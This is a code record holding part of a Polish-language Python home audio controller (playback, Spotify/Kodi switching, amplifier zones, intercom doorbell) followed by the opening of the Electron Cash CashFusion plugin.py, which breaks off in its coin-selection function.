# return THutils.skonstruuj_odpowiedzV2(constants.RODZAJ_KOMUNIKATU_LIRYKI, lir, constants.STATUS_OK)
#else:
# return THutils.skonstruuj_odpowiedzV2(constants.RODZAJ_KOMUNIKATU_LIRYKI, '', constants.STATUS_NOK)
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_LIRYKI,
{constants.RODZAJ_KOMUNIKATU_LIRYKI: self.liryki.tekstPiosenki})
elif komenda == 'IC':
if parametr1 == constants.PARAMETR_JEDEN:
self.ic_trwa = True
self.logger.info('Rozpoczynam interkom.')
elif komenda == 'OL':
#thread.start_new_thread(self.odtwarzaj_z_linku_zeruj_playliste, (parametr1, parametr2))
self.odtwarzaj_z_linku_zeruj_playliste(parametr1, parametr2)
elif komenda == 'SPOTIFY':
if parametr1 == 'L+01':
threading.Thread(target=self.aktualna_playlista.dodaj_z_linku_spotify, args=(parametr2,)).start()
#thread.start_new_thread(self.aktualna_playlista.dodaj_z_linku_spotify, (parametr2,))
elif parametr1 == 'OD':
threading.Thread(target=self.odtwarzaj_ze_spotify_uri, args=(parametr2,)).start()
#thread.start_new_thread(self.odtwarzaj_ze_spotify_uri, (parametr2,))
elif komenda == 'QUERY_SPOTIFY':
spot = spotify_klasa.SpotifyKlasa(self.logger)
#odp = spot.zapytanie('', parametr1, parametr2)
odp = spot.szukaj_zdalnie(parametr1, next=parametr2)
#return {constants.RODZAJ_KOMUNIKATU: constants.RODZAJ_KOMUNIKATU_SPOTIFY_QUERY,
# constants.RESULT: odp}
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_SPOTIFY_QUERY, odp)
elif komenda == 'SPOTIFY_NEXT':
spot = spotify_klasa.SpotifyKlasa(self.logger)
odp = spot.nastepny(parametr1)
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_SPOTIFY_NEXT, odp)
elif komenda == 'SPOTIFY_ROZWINIECIE':
spot = spotify_klasa.SpotifyKlasa(self.logger)
odp = spot.rozwin(parametr1, parametr2)
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_SPOTIFY_ROZWIN, odp)
elif komenda == 'RO':
#thread.start_new_thread(self.odtwarzaj_z_radii_po_nazwie, (parametr1, parametr2))
self.odtwarzaj_z_radii_po_nazwie(parametr1, parametr2)
elif komenda == 'RO_ID':
#thread.start_new_thread(self.odtwarzaj_z_radii_po_id, (parametr1, parametr2))
self.odtwarzaj_z_radii_po_id(parametr1, parametr2)
elif komenda == 'OD':
if parametr1 == 'PAUS':
#thread.start_new_thread(self.play_pause, ())
self.play_pause()
elif parametr1 == 'NAST':
#thread.start_new_thread(self.nastepny, ())
self.nastepny()
elif parametr1 == 'POPR':
#thread.start_new_thread(self.poprzedni, ())
self.poprzedni()
elif parametr1 == 'GOTO':
threading.Thread(target=self.idz_do, args=(int(parametr2),)).start()
#thread.start_new_thread(self.idz_do, (int(parametr2),))
elif parametr1 == 'RODZ':
self.aktualna_playlista.jak_odtwarza = int(parametr2)
elif parametr1 == 'LINK':
#thread.start_new_thread(self.odtwarzaj_z_linku_zeruj_playliste, (parametr2, ''))
self.odtwarzaj_z_linku_zeruj_playliste(parametr2, '')
elif parametr1 == 'ULUB':
# TODO sprawdzic ktore jeszcze mozna zrezygnowac z osobnego threadu
status_odpowiedzi = self.odtwarzaj_ulubione_numer(int(parametr2))
if status_odpowiedzi == constants.STATUS_OK:
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA,
self.biezacy_stan.biezacyStanDoTuple())
else:
return THutils.skonstruuj_odpowiedzV2_NOK('Brak ulubionego o podanym numerze. Odswiez ulubione.')
elif parametr1 == 'ULU-':
#thread.start_new_thread(self.ulub.usun_ulubione, (parametr2,))
self.ulub.usun_ulubione(parametr2)
elif parametr1 == 'ULU+':
threading.Thread(target=self.dodaj_do_playlisty_z_ulubionego, args=(int(parametr2),)).start()
#thread.start_new_thread(self.dodaj_do_playlisty_z_ulubionego, (int(parametr2),))
elif parametr1 == 'HIST':
threading.Thread(target=self.odtworz_z_historii, args=(parametr2,)).start()
#thread.start_new_thread(self.odtworz_z_historii, (parametr2,))
elif parametr1 == 'HIST+':
threading.Thread(target=self.odtworz_z_historii, args=(parametr2, True)).start()
#thread.start_new_thread(self.odtworz_z_historii, (parametr2, True))
else:
pass
elif komenda == 'PL':
if parametr1 == 'ULUB':
pass
elif parametr1 == 'LIS+':
threading.Thread(target=self.ulub.zapisz_playliste_w_ulubionych, args=(self.aktualna_playlista, parametr2)).start()
#thread.start_new_thread(self.ulub.zapisz_playliste_w_ulubionych, (self.aktualna_playlista, parametr2))
elif parametr1 == 'LIST':
pass
elif parametr1 == 'PLAY':
#thread.start_new_thread(self.odtwarzaj_z_playlisty, (int(parametr2),))
self.logger.info('Odtwarzam z playlisty pozycje nr: ' + str(parametr2))
self.odtwarzaj_z_playlisty(nr_poz=int(parametr2))
elif parametr1 == 'L+01':
threading.Thread(target=self.aktualna_playlista.dodaj_z_linku, args=(parametr2, "")).start()
#thread.start_new_thread(self.aktualna_playlista.dodaj_z_linku, (parametr2, ""))
elif parametr1 == 'L-01':
nr_pozycji = int(parametr2)
if self.aktualna_playlista.usun_pozycje_z_playlisty(nr_pozycji):
self.odtwarzaj_z_playlisty()
# elif komenda == 'WZ':
# if parametr2 == constants.PARAMETR_JEDEN:
# self.wlacz_wylacz_wzmacniacz_nazwa(parametr1, True)
# else:
# self.wlacz_wylacz_wzmacniacz_nazwa(parametr1, False)
elif komenda == 'WZ_TOGGLE':
self.toggle_wzmacniacz_nazwa(parametr1)
self.aktualizuj_status_odtwarzacza()
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA,
self.biezacy_stan.biezacyStanDoTuple())
def odtworz_z_historii(self, hash_historii, dodaj=False):
# self.logger.info('Odtwarzam z historii, nr hash: ' + str(hash))
hist = self.aktualna_playlista.odczytaj_historie()
poz = None
for a in hist:
if str(a[constants.HASH]) == str(hash_historii):
poz = a
break
if poz:
pozy = self.aktualna_playlista.pozycja_z_json(poz[constants.POZYCJA])
if dodaj:
self.logger.info("Dodaje do playlisty z historii: " + str(poz[constants.POZYCJA]))
self.aktualna_playlista.pozycje.append(pozy)
self.aktualna_playlista.zapisz_playliste()
else:
self.logger.info("Odtwarzam z historii: " + str(poz[constants.POZYCJA]))
self.aktualna_playlista.zeruj()
self.aktualna_playlista.pozycje.append(pozy)
self.aktualna_playlista.zapisz_playliste()
self.odtwarzaj_z_playlisty(zapisuj_historie=False)
else:
self.logger.warning("Nie odnalazlem pozycji historii dla has: " + str(hash_historii))
def odtworz_z_pliku(self, plik, usuwac_plik=False):
self.ic_trwa = True
# zapamietanie glosnosci i aktualnej pozycji
self.logger.info('Odtwarzam z pliku: ' + str(plik))
k_stan = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA).stan
k_gl = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA).glosnosc
l_stan = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA).stan
l_gl = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA).glosnosc
t_stan = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_TARAS).stan
t_gl = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_TARAS).glosnosc
# glosnosci = {}
# for j in self.wzmacniacze.wzmacniacze:
# glosnosci.append(j)
#for j in self.wzmacniacze.wzmacniacze:
# glosnosci.append(j.glosnosc)
percent = int(self.odtwarzacz.percentage)
# IC_czy_gralo - jesli True to znaczy, ze poprzednio gralo i mamy wznowic
self.IC_czy_gralo = self.wzmacniacze.czy_ktorykolwiek_wlaczony()
self.logger.warning('IC-zlecam stop')
self.stop()
#self.pauza()
licznik = 0
while self.odtwarzacz.aktualnie_gra:
self.logger.warning('IC-jeszcze gra czekam w loopie, do skutku')
self.odtwarzacz.aktualizuj_stan()
time.sleep(0.5)
licznik = licznik + 1
if licznik > 100:
self.logger.warning('IC-licznik przy STOP sie przekrecil')
break
#while odtwarzacz gra to czekamy i liczymy do stu albo wiecej, bez timesleep
self.logger.warning('IC-podmieniam odtwarzacz na KODI')
self.odtwarzacz = self.kodi
# ustawienie wlaczenia wszystkich wzmacniaczy i ich glosnosci
for j in self.wzmacniacze.wzmacniacze:
j.ustaw_glosnosc(self.glosnosc_przy_dzwonku)
self.wzmacniacze.wlacz_wylacz_wszystkie(True)
# odtwarzanie za pomoca kodi, zakladamy, ze kodi jest juz ustawione jako odtwarzacz
self.odtwarzacz.odtwarzaj_z_linku(plik)
self.odtwarzacz.aktualnie_gra = True
licznik = 0
self.logger.warning('IC-rozpoczynam loop czekania az skonczy odtwarzac')
while self.odtwarzacz.aktualnie_gra:
licznik = licznik + 1
if licznik > 100:
self.logger.warning('IC-licznik przy odtwarzaniu sie przekrecil')
break
time.sleep(2)
self.odtwarzacz.aktualizuj_stan()
self.logger.warning('IC-zakonczylem loop czekania na odwtorzenie dzownka')
# usuniecie pliku z interkomem
if usuwac_plik:
os.remove(plik)
# odtworzenie stanu przekaznikow i glosnosci
'''self.wzmacniacze.wlacz_wylacz_wszystkie(False)
a = 0
for j in self.wzmacniacze.wzmacniacze:
j.ustaw_glosnosc(glosnosci[a])
a = a + 1'''
self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA).wlacz_wylacz(k_stan)
self.wzmacniacze.set_glosnosc_nazwa(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA, k_gl)
self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_TARAS).wlacz_wylacz(t_stan)
self.wzmacniacze.set_glosnosc_nazwa(wzmacniacze.NAZWA_WZMACNIACZA_TARAS, t_gl)
self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA).wlacz_wylacz(l_stan)
self.wzmacniacze.set_glosnosc_nazwa(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA, l_gl)
if self.IC_czy_gralo:
self.logger.warning('IC-gralo poprzednio, odtwarzam z playlisty')
self.odtwarzaj_z_playlisty()
if self.aktualna_playlista.aktualna_pozycja().typ != playlista.TYP_RADIO:
licznik = 0
self.odtwarzacz.aktualizuj_stan()
while not self.odtwarzacz.aktualnie_gra:
time.sleep(0.5)
self.odtwarzacz.aktualizuj_stan()
licznik = licznik + 1
if licznik > 100:
break
self.idz_do(percent)
self.ic_trwa = False
def zwroc_status_arduino(self, nazwa):
if self.wzmacniacze.stan_wzmacniacza_po_nazwie(nazwa):
a = '1'
else:
a = '0'
return 'S' + a + \
'G' + str("{0:0=3d}".format(self.wzmacniacze.wzmacniacz_po_nazwie(nazwa).glosnosc))
def aktualizuj_cyklicznie_stan_odtwarzacza(self):
#TODO ten licznik_delay nie jest potrzebny
if self.licznik_delay_odswiezania == LICZBA_ODSWIEZEN_DO_STATUSU:
self.licznik_delay_odswiezania = 0
else:
self.licznik_delay_odswiezania += 1
if self.wzmacniacze.czy_ktorykolwiek_wlaczony():
self.licznik_delay_odswiezania = 0
if self.licznik_delay_odswiezania == 0:
self.aktualizuj_status_odtwarzacza()
# odtwarzanie kolejnego utworu
if not self.ic_trwa:
# TODO pauza powinna byc jednoznaczna z ktorykolwiek wlaczony=false
if self.wzmacniacze.czy_ktorykolwiek_wlaczony() and self.pauza is False:
if not self.odtwarzacz.aktualnie_gra:
# delta ma sluzyc temu aby co 0,5 sekundy nie probowac kazac kodi odtwarzac tego samego
delta = datetime.datetime.now() - self.czas_ostatniego_polecenia_odtwarzania
if delta.total_seconds() > CZAS_PRZERWY_MIEDZY_PROBAMI_ODTWARZANIA:
self.aktualna_playlista.oblicz_kolejny_do_grania()
threading.Thread(target=self.odtwarzaj_z_playlisty).start()
#for j in self.wzmacniacze.wzmacniacze:
# j.ustaw_glosnosc(j.glosnosc)
self.automatyczne_wylaczanie_przy_braku_aktywnosci()
threading.Timer(CZAS_ODSWIEZANIA_STANU_ODTWARZACZA, self.aktualizuj_cyklicznie_stan_odtwarzacza).start()
def przekaz_stan_naglosnienia_do_garazu(self, firebase=False):
if firebase:
fire = constants.PARAMETR_JEDEN
else:
fire = constants.PARAMETR_ZERO
THutils.przekaz_polecenie_V2_JSONRPC(constants.get_HOST_I_PORT_GARAZ_v2(),
constants.OBSZAR_STAT,
constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA_PUSH_ZE_STRYCHU_NAGLOSN,
self.biezacy_stan.biezacyStanDoTuple(), fire)
def przekaz_stan_wzmacniaczy_do_garazu(self):
THutils.przekaz_polecenie_V2_JSONRPC(constants.get_HOST_I_PORT_GARAZ_v2(),
constants.OBSZAR_STAT,
constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA_PUSH_ZE_STRYCHU_WZMACN,
self.wzmacniacze.do_listy(), constants.PARAMETR_JEDEN)
def aktualizuj_status_odtwarzacza(self): #, force_kodi=False):
if self.ic_trwa:
self.logger.warning('Nie aktualizuje stanu odtwarzacza bo trwa IC')
return
przekaz_stan_do_gar = False
fire = False
self.lock_aktualizacji_statusu.acquire()
poprzedni_stan = deepcopy(self.biezacy_stan)
self.odtwarzacz.aktualizuj_stan()
self.biezacy_stan.wzmacniacze = self.wzmacniacze.do_listy()
self.biezacy_stan.interkom = self.ic_trwa
self.biezacy_stan.czy_aktualnie_gra = self.odtwarzacz.aktualnie_gra
self.biezacy_stan.pauza = self.pauza
self.biezacy_stan.nazwa_playlisty = self.aktualna_playlista.nazwa
# self.biezacy_stan.nr_pozycji_na_playliscie = self.aktualna_playlista.nr_pozycji_na_playliscie
self.biezacy_stan.liczba_pozycji_playlisty = self.aktualna_playlista.liczba_pozycji()
self.biezacy_stan.ts_playlisty = self.aktualna_playlista.ts
self.biezacy_stan.ts_ulubionych = self.ulub.ts
self.biezacy_stan.ts_wzmacniaczy = self.wzmacniacze.ts
self.biezacy_stan.ts_radii = self.katalog_radii.ts
self.biezacy_stan.ts_historii = self.aktualna_playlista.ts_historii
tytul = ''
poz = self.aktualna_playlista.aktualna_pozycja() # type: playlista.PozycjaPlaylisty
if poz is not None:
# TODO czy nie mozna przejsc zawsze na self.odtwarzacz.tytul?
if poz.typ == playlista.TYP_RADIO:
if poz.serwis_radiowy == radia.NAZWA_SERWISU_OPENFM:
if poz.ts_stop < int(time.time()):
if self.wzmacniacze.czy_ktorykolwiek_wlaczony():
artysta, album, tytul_utworu, ts_konca = self.katalog_radii.odswiez_co_grane_openfm(poz.id_stacji_radiowej)
poz.album = album
poz.artist = artysta
poz.title = tytul_utworu
tytul = tytul_utworu
# kontrola nie za czestego odczytywania co grane
if ts_konca < int(time.time()):
poz.ts_stop = int(time.time()) + radia.INTERWAL_ODCZYTU_CO_GRANE
else:
poz.ts_stop = ts_konca
else:
tytul = self.odtwarzacz.tytul
else:
tytul = THutils.xstr(poz.title)
self.biezacy_stan.aktualna_pozycja = poz
self.biezacy_stan.nazwa_playlisty = self.aktualna_playlista.nazwa
#TODO ta zmienna do usuniecia w API i androdi
self.biezacy_stan.czy_gra_denon = False
self.biezacy_stan.totaltime = self.odtwarzacz.totaltime
self.biezacy_stan.currenttime = self.odtwarzacz.currenttime
self.biezacy_stan.percentage = self.odtwarzacz.percentage
a = self.wzmacniacze.czy_ktorykolwiek_wlaczony()
if self.biezacy_stan.czy_aktualnie_gra != poprzedni_stan.czy_aktualnie_gra:
fire = True
self.biezacy_stan.ktorykolwiek_wlaczony = a
if self.biezacy_stan.tytul != tytul:
if not self.ic_trwa:
self.biezacy_stan.tytul = tytul
przekaz_stan_do_gar = True
fire = True
else:
self.biezacy_stan.tytul = tytul
try:
link = self.aktualna_playlista.aktualna_pozycja().link
except AttributeError:
link = ''
try:
if self.biezacy_stan.link != link:
if not self.ic_trwa:
przekaz_stan_do_gar = True
fire = True
except AttributeError:
self.logger.warning("Brak sekcji [aktualna_pozycja]: " + str(self.biezacy_stan.aktualna_pozycja.pozycja_do_listy()))
self.biezacy_stan.link = link
if poprzedni_stan.biezacyStanDoTuple() != self.biezacy_stan.biezacyStanDoTuple():
self.biezacy_stan.ts = int(time.time())
przekaz_stan_do_gar = True
if przekaz_stan_do_gar:
self.przekaz_stan_naglosnienia_do_garazu(firebase=fire)
self.lock_aktualizacji_statusu.release()
def odtwarzaj_ulubione_numer(self, numer_ulubionego):
ul = self.ulub.ulubiony_po_numerze(numer_ulubionego)
if not ul:
self.logger.warning('Odtwarzaj-ulub_numer, nie ma takiego numeru: ' +
str(numer_ulubionego))
return constants.STATUS_NOK
self.kasuj_czas_ostatniej_aktywnosci()
self.stop()
self.aktualna_playlista.inicjalizuj_playliste_z_pliku(ul.get_plik())
self.odtwarzaj_z_playlisty(0)
self.logger.info('Odtwarzam ulubione nr: ' + str(numer_ulubionego) +
" : " + ul.get_nazwa())
return constants.STATUS_OK
def dodaj_do_playlisty_z_ulubionego(self, numer_ulubionego):
ul = self.ulub.ulubiony_po_numerze(numer_ulubionego)
if not ul:
self.logger.warning('Dodaj-ulub_numer, nie ma takiego numeru: ' +
str(numer_ulubionego))
return
#if ul.typ == playlista.TYP_RADIO:
# return
self.kasuj_czas_ostatniej_aktywnosci()
self.aktualna_playlista.inicjalizuj_playliste_z_pliku(ul.get_plik(), zeruj=False)
def odtwarzaj_z_radii_po_id(self, nazwa_serwisu, idstacji):
self.logger.info('Odtwarzam z radii: ' + nazwa_serwisu + ' ' + str(idstacji))
a = self.katalog_radii.znajdz_stacje_po_nazwie_i_id(nazwa_serwisu, idstacji)
if not a:
self.logger.warning('Nie odnalazlem takiego radia po id: ' + nazwa_serwisu + ' ' + idstacji)
return
self.odtwarzaj_z_radii(a)
def odtwarzaj_z_radii_po_nazwie(self, nazwa_serwisu, nazwa_stacji):
self.logger.info('Odtwarzam z radii: ' + nazwa_serwisu + ' ' + nazwa_stacji)
a = self.katalog_radii.znajdz_stacje_po_nazwie_i_serwisie(nazwa_serwisu, nazwa_stacji)
if not a:
self.logger.warning('Nie odnalazlem takiego radia: ' + nazwa_serwisu + ' ' + nazwa_stacji)
return
self.odtwarzaj_z_radii(a)
def odtwarzaj_z_radii(self, radio):
# radio to stacja radiowa
self.stop()
self.aktualna_playlista.zeruj()
self.aktualna_playlista.nazwa = radio.nazwa_serwisu + ' - ' + radio.nazwa_radia
ts_konca = 0
link = radio.link
artysta = album = ''
if radio.nazwa_serwisu == radia.NAZWA_SERWISU_TUNEIN:
link = self.katalog_radii.tunein_dekoduj_stream_stacji(radio.link)
#elif radio.nazwa_serwisu == radia.NAZWA_SERWISU_OPENFM:
# zwraca artyste, album, tytul oraz timestamp konca
# artysta, album, tytul, ts_konca = self.katalog_radii.odswiez_co_grane_openfm(int(radio.id_radia))
self.aktualna_playlista.dodaj_pozycje_z_polami(artist=artysta, album=album, title=radio.nazwa_radia,
link=link, typ=playlista.TYP_RADIO, fanart=radio.logo,
serwis_radiowy=radio.nazwa_serwisu,
stacja_radiowa=radio.nazwa_radia,
id_stacji_radiowej=radio.id_radia,
ts_konca=ts_konca)
self.odtwarzaj_z_playlisty()
def odtwarzaj_z_linku_zeruj_playliste(self, link, fanartlink):
self.stop()
self.aktualna_playlista.zeruj()
self.aktualna_playlista.dodaj_z_linku(link, fanartlink, zmien_nazwe=True)
self.odtwarzaj_z_playlisty(0)
def odtwarzaj_ze_spotify_uri(self, uri):
self.stop()
self.aktualna_playlista.zeruj()
self.aktualna_playlista.dodaj_z_linku_spotify(uri, zmien_nazwe=True)
self.odtwarzaj_z_playlisty()
def play_pause(self):
self.kasuj_czas_ostatniej_aktywnosci()
self.czas_ostatniego_polecenia_odtwarzania = datetime.datetime.now()
self.pauza = not self.pauza
# if self.odtwarzaj_denon:
# self.den.heos_stop()
# else:
if self.aktualna_playlista.liczba_pozycji() > 0:
if self.aktualna_playlista.pozycje[0].typ == playlista.TYP_RADIO:
if self.pauza:
self.odtwarzacz.stop()
else:
self.odtwarzaj_z_playlisty(zapisuj_historie=False)
else:
self.odtwarzacz.play_pause(start=not self.pauza)
def idz_do(self, czas):
# czas jest w procentach
self.kasuj_czas_ostatniej_aktywnosci()
# if self.odtwarzaj_denon:
# self.den.heos_idz_do(czas)
# else:
self.odtwarzacz.idz_do(czas)
def stop(self):
self.kasuj_czas_ostatniej_aktywnosci()
# if self.odtwarzaj_denon:
# self.den.heos_stop()
# else:
self.odtwarzacz.stop()
def odtwarzaj_z_playlisty(self, nr_poz=None, zapisuj_historie=True):
if self.aktualna_playlista.liczba_pozycji() == 0:
self.logger.warning('odtwarzaj z plalisty: pusta playlista')
return
if nr_poz:
self.aktualna_playlista.nr_pozycji_na_playliscie = nr_poz
if zapisuj_historie:
try:
self.aktualna_playlista.zapisz_w_historii(
self.aktualna_playlista.pozycje[self.aktualna_playlista.nr_pozycji_na_playliscie])
except IndexError:
pass
self.czas_ostatniego_polecenia_odtwarzania = datetime.datetime.now()
#TODO ten stop chyba nie jest potrzebny i jest powolny w dodatku
#self.odtwarzacz.stop()
self.podmien_odtwarzacz()
self.odtwarzacz.odtwarzaj_z_linku(self.aktualna_playlista.aktualnie_grane_link())
self.aktualna_playlista.zapisz_playliste()
if isinstance(self.odtwarzacz, spotify_odtwarzacz.SpotifyOdtwarzacz):
artysta = self.aktualna_playlista.aktualna_pozycja().artist
piosenka = self.aktualna_playlista.aktualna_pozycja().title
threading.Thread(target=self.liryki.odczytaj_liryki, args=(artysta, piosenka)).start()
def podmien_odtwarzacz(self):
if self.aktualna_playlista.aktualna_pozycja() is not None:
if self.aktualna_playlista.aktualna_pozycja().typ == playlista.TYP_SPOTIFY:
self.spoti.aktualizuj_stan()
self.odtwarzacz = self.spoti
self.logger.warning('podmienilem odtwarzacz na spotify')
else:
self.kodi.aktualizuj_stan()
self.odtwarzacz = self.kodi
self.logger.warning('podmienilem odtwarzacz na kodi')
def nastepny(self):
self.kasuj_czas_ostatniej_aktywnosci()
if not self.odtwarzacz.aktualnie_gra:
return
if self.aktualna_playlista.nastepny():
self.odtwarzaj_z_playlisty()
def poprzedni(self):
self.kasuj_czas_ostatniej_aktywnosci()
if not self.odtwarzacz.aktualnie_gra:
return
if self.aktualna_playlista.poprzedni():
self.odtwarzaj_z_playlisty()
def kasuj_czas_ostatniej_aktywnosci(self):
self.czas_ostatniej_aktywnosci = datetime.datetime.now()
def odczytaj_konf(self):
# TODO porzadek z konfiguracja
self.plik_dzwonka = os.path.dirname(os.path.realpath(__file__)) + '/' + \
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'PLIK_DZWONKA', self.logger)
self.glosnosc_przy_dzwonku = int(
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'GLOSNOSC_PRZY_DZWONKU', self.logger))
self.czas_odczytu_konfiguracji = int(
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'CZAS_ODCZYTU_KONFIG', self.logger))
self._czas_maksymalnego_braku_aktywnosci = int(
THutils.odczytaj_parametr_konfiguracji(constants.OBSZAR_NAGL, 'CZAS_MAKSYMALNEGO_BRAKU_AKTYWNOSCI', self.logger))
now = datetime.datetime.now()
run_at = now + datetime.timedelta(hours=self.czas_odczytu_konfiguracji)
delay = (run_at - now).total_seconds()
threading.Timer(delay, self.odczytaj_konf).start()
def toggle_wzmacniacz_nazwa(self, nazwa):
if self.wzmacniacze.stan_wzmacniacza_po_nazwie(nazwa):
self.wlacz_wylacz_wzmacniacz_nazwa(nazwa, False)
else:
self.wlacz_wylacz_wzmacniacz_nazwa(nazwa, True)
self.ts = int(time.time())
def wlacz_wylacz_wzmacniacz_nazwa(self, nazwa, stan):
# stan jest boolean
self.kasuj_czas_ostatniej_aktywnosci()
if stan:
self.logger.info('Wlaczylem wzmacniacz : ' + str(nazwa))
else:
self.logger.info('Wylaczylem wzmacniacz : ' + str(nazwa))
self.wzmacniacze.wzmacniacz_po_nazwie(nazwa).wlacz_wylacz(stan)
self.wzmacniacze.ts = int(time.time())
self.przekaz_stan_wzmacniaczy_do_garazu()
# pauza jesli wszystko beda wylaczone
if not self.wzmacniacze.czy_ktorykolwiek_wlaczony():
self.play_pause()
return
if stan and self.pauza:
self.play_pause()
def wylacz_wszystkie_wzmacniacze(self):
for w in self.wzmacniacze.wzmacniacze:
self.wlacz_wylacz_wzmacniacz_nazwa(w.nazwa, False)
self.wzmacniacze.ts = int(time.time())
def automatyczne_wylaczanie_przy_braku_aktywnosci(self):
roznica = datetime.datetime.now() - self.czas_ostatniej_aktywnosci
if roznica.total_seconds() > self._czas_maksymalnego_braku_aktywnosci:
if self.wzmacniacze.czy_ktorykolwiek_wlaczony():
self.wylacz_wszystkie_wzmacniacze()
# self.play_pause()
self.logger.info('Wylaczam wzmacn przy braku aktywnosci. Czas ostatn aktywn: ' +
str(self.czas_ostatniej_aktywnosci))
# threading.Timer(CZAS_SPRAWDZANIA_OSTATNIEJ_AKTYWNOSCI,
# self.automatyczne_wylaczanie_przy_braku_aktywnosci).start()
|
plugin.py
|
#!/usr/bin/env python3
#
# Electron Cash - a lightweight Bitcoin Cash client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Base plugin (non-GUI)
"""
import math
import threading
import time
import weakref
from typing import Optional, Tuple
from electroncash.address import Address, OpCodes
from electroncash.bitcoin import COINBASE_MATURITY, TYPE_SCRIPT
from electroncash.plugins import BasePlugin, hook, daemon_command
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import profiler, PrintError, InvalidPassword
from electroncash import Network, networks, Transaction
from .conf import Conf, Global
from .fusion import Fusion, can_fuse_from, can_fuse_to, is_tor_port, MIN_TX_COMPONENTS
from .server import FusionServer
from .covert import limiter
from .protocol import Protocol
from .util import get_coin_name
import random # only used to select random coins
TOR_PORTS = [9050, 9150]
# if more than <N> tor connections have been made recently (see covert.py) then don't start auto-fuses.
AUTOFUSE_RECENT_TOR_LIMIT_LOWER = 60
# if more than <N> tor connections have been made recently (see covert.py) then shut down auto-fuses that aren't yet started
AUTOFUSE_RECENT_TOR_LIMIT_UPPER = 120
# heuristic factor: guess that expected number of coins in wallet in equilibrium is = (this number) / fraction
COIN_FRACTION_FUDGE_FACTOR = 10
# for semi-linked addresses (that share txids in their history), allow linking them with this probability:
KEEP_LINKED_PROBABILITY = 0.1
# how long an auto-fusion may stay in 'waiting' state (without starting-soon) before it cancels itself
AUTOFUSE_INACTIVE_TIMEOUT = 600
# how many random coins to select max in 1 batch -- used by select_random_coins
DEFAULT_MAX_COINS = 20
assert DEFAULT_MAX_COINS > 10
# how many autofusions can be running per-wallet
MAX_AUTOFUSIONS_PER_WALLET = 10
CONSOLIDATE_MAX_OUTPUTS = MIN_TX_COMPONENTS // 3
# Threshold for proportion of total wallet value fused before stopping fusion. This avoids re-fusion due to dust.
FUSE_DEPTH_THRESHOLD = 0.999
# We don't allow a fuse depth beyond this in the wallet UI
MAX_LIMIT_FUSE_DEPTH = 10
pnp = None
def get_upnp():
""" return an initialized UPnP singleton """
global pnp
if pnp is not None:
return pnp
try:
import miniupnpc
except ImportError:
raise RuntimeError("python miniupnpc module not installed")
u = miniupnpc.UPnP()
if u.discover() < 1:
raise RuntimeError("can't find UPnP server")
try:
u.selectigd()
except Exception as e:
raise RuntimeError("failed to connect to UPnP IGD")
pnp = u
return u
def select_coins(wallet):
""" Sort the wallet's coins into address buckets, returning two lists:
- Eligible addresses and their coins.
- Ineligible addresses and their coins.
An address is eligible if it satisfies all conditions:
- the address is unfrozen
- has 1, 2, or 3 utxo
- all utxo are confirmed (or matured in case of coinbases)
- has no SLP utxo or frozen utxo
"""
# First, select all the coins
eligible = []
ineligible = []
has_unconfirmed = False
has_coinbase = False
sum_value = 0
mincbheight = (wallet.get_local_height() + 1 - COINBASE_MATURITY if Conf(wallet).autofuse_coinbase
else -1) # -1 here causes coinbase coins to always be rejected
for addr in wallet.get_addresses():
acoins = list(wallet.get_addr_utxo(addr).values())
if not acoins:
continue # prevent inserting empty lists into eligible/ineligible
good = True
if addr in wallet.frozen_addresses:
good = False
for i,c in enumerate(acoins):
sum_value += c['value'] # tally up values regardless of eligibility
# If too many coins, any SLP tokens, any frozen coins, or any
# immature coinbase on the address -> flag all address coins as
# ineligible if not already flagged as such.
good = good and (
